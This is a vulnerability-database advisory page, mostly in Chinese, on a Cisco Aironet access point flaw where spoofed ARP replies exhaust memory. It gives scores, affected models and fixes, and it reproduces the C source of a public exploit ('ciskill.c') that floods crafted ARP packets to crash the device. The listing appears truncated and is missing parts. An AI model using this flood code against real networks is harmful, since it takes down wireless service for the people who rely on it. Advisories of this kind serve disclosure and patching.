发布时间 :2006-01-22 15:03:00
修订时间 :2011-03-07 21:29:50

[原文]Cisco IOS before 12.3-7-JA2 on Aironet Wireless Access Points (WAP) allows remote authenticated users to cause a denial of service (termination of packet passing or termination of client connections) by sending the management interface a large number of spoofed ARP packets, which creates a large ARP table that exhausts memory, aka Bug ID CSCsc16644.

[CNNVD]Cisco Aironet无线接入点ARP攻击拒绝服务漏洞(CNNVD-200601-286)

        Cisco Aironet无线接入点(AP)是非常流行的无线接入网络设备。
        Cisco Aironet对ARP请求的处理上存在漏洞,远程攻击者可能利用漏洞对设备进行拒绝服务攻击。能够成功关联Cisco IOS无线接入点的攻击者可以欺骗到接入点管理接口的ARP消息。攻击者可以在设备的ARP列表添加条目,直至完全耗尽物理内存。这会导致设备在断电加电重载之前无法传送通讯,影响无线接入点的可用性,可能会无法使用管理和报文转发服务。

- CVSS (基础分值)

CVSS分值: 5.5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]

- CWE (弱点类目)

CWE-399 [资源管理错误]

- CPE (受影响的平台与产品)

cpe:/h:cisco:aironet_ap1230agCisco Aironet 1230AG
cpe:/h:cisco:aironet_ap1400Cisco Aironet 1400
cpe:/h:cisco:aironet_ap350Cisco Aironet 350 IOS
cpe:/h:cisco:aironet_ap1300Cisco Aironet 1300
cpe:/h:cisco:aironet_ap1200Cisco Aironet 1200
cpe:/h:cisco:aironet_ap1240agCisco Aironet 1240AG
cpe:/h:cisco:aironet_ap1130agCisco Aironet 1130AG
cpe:/h:cisco:aironet_ap1100Cisco Aironet 1100

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5680Cisco Aironet Access Point ARP Memory Exhaustion DoS Vulnerability

- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(PATCH)  SECTRACK  1015483
(UNKNOWN)  XF  cisco-aironet-arp-dos(24086)
(UNKNOWN)  VUPEN  ADV-2006-0176
(UNKNOWN)  BID  16217
(VENDOR_ADVISORY)  CISCO  20060112 Access Point Memory Exhaustion from ARP Attacks

- 漏洞信息

Cisco Aironet无线接入点ARP攻击拒绝服务漏洞
中危 资源管理错误
2006-01-22 00:00:00 2009-03-04 00:00:00
        Cisco Aironet无线接入点(AP)是非常流行的无线接入网络设备。
        Cisco Aironet对ARP请求的处理上存在漏洞,远程攻击者可能利用漏洞对设备进行拒绝服务攻击。能够成功关联Cisco IOS无线接入点的攻击者可以欺骗到接入点管理接口的ARP消息。攻击者可以在设备的ARP列表添加条目,直至完全耗尽物理内存。这会导致设备在断电加电重载之前无法传送通讯,影响无线接入点的可用性,可能会无法使用管理和报文转发服务。

- 公告与补丁


- 漏洞信息 (1447)

Cisco Aironet Wireless Access Points Memory Exhaustion ARP Attack DoS (EDBID:1447)
hardware dos
2006-01-25 Verified
0 Pasv
N/A [点击下载]
// Cisco Killer - ciskill.c
// Usage: ./ciskill [device]
// Author: Pasv (pasvninja [at]
// Credit: This exploit takes advantage of a vulnerability that was
// discovered by Eric Smith on January 12, 2006 (bid:16217)
// Greets to NW, zimmy, GSO, and the rest.
// Description: The vulnerability exists in the way the affected versions
// below handle ARP replies, if enough specially crafted ARP packets are sent
// on the network with the affected systems it will cause the access point memory
// exhaustion which will in a few seconds (depending on the speed of the attacker
// and the memory of the target) crash the system, making all ingoing/outgoing
// traffic stopped.
// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility
// for your actions (like a knife maker).
// Versions affected:
//  Cisco Aironet 350 IOS
//  Cisco Aironet 1400
//  Cisco Aironet 1300
//  Cisco Aironet 1240AG
//  Cisco Aironet 1230AG
//  Cisco Aironet 1200
//  Cisco Aironet 1130AG
//  Cisco Aironet 1100
// (this includes most linksys wireless access points)

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <linux/if_ether.h>
#include <linux/sockios.h>

// Edit this packet accordingly if the target is picky
char pkt[]=
// Ethernet header
"\xff\xff\xff\xff\xff\xff" 	// Destination: broadcast
"AAAAAA"			// Source: 41:41:41:41:41:41
"\x08\x06"			// Pkt type: ARP
// ARP header
"\x00\x01"			// Hardware type: Ethernet
"\x08\x00"			// Protocol: IP
"\x06"				// Hardware size: 6
"\x04"				// Protocol size: 4
"\x00\x02"			// Opcode: Reply
"AAAAAA"			// Sender (Mac): 41:41:41:41:41:41
"AAAA"				// Sender (IP):
"AAAAAA"			// Target (mac): 41:41:41:41:41:41
"AAAA"				// Target (IP):
; // End of Packet

int main(int argc, char **argv) {
	FILE *fp;
	int sock, seed;
	long count;
	char *device;
	in_addr_t addr;
	struct sockaddr sin;
	printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n");
	if(getuid()) {
		printf("Must be root to inject arp packets!\n");
	if(argc != 2) {
	else {

	fp = fopen("/dev/urandom", "r");
	fscanf(fp,"%d", &seed);
	memset(&sin, 0, sizeof(sin));
	sin.sa_family = AF_UNSPEC;
	strncpy(sin.sa_data,device, 14);
	sock = socket(PF_INET, SOCK_PACKET, 0x300);
	printf("Using device: %s\n\n", device);	
	// stupid
	printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n");
	sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1);
	while(1) {
		addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff);
		pkt[28] = (char)addr;
		pkt[38] = (char)addr;
		printf("#:%ld bytes sent: %d (should be 42)\n",count,  sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin)));

// [2006-01-25]

- 漏洞信息

Cisco Aironet Access Point ARP Memory Exhaustion DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public, Exploit Unknown

- 漏洞描述

Cisco Aironet Access Points contain a flaw that may allow a remote denial of service. The issue is triggered when an attacker sends many spoofed ARP messages to the management interface of the AP, adding entries to the ARP table until the memory is exhausted, and will result in loss of availability for the AP until it is restarted.

- 时间线

2006-01-12 Unknow
Unknow Unknow

- 解决方案

Upgrade to IOS version 12.3-7-JA2 or higher, as it has been reported to fix this vulnerability. In addition to the software upgrade, a configuration change is necessary: add the command L2-FILTER BLOCK-ARP to each radio interface. It is also possible to correct the flaw by implementing the following workaround(s): Use VLANs to isolate wireless clients from the Access Point (AP) management interface.

- 相关参考

- 漏洞作者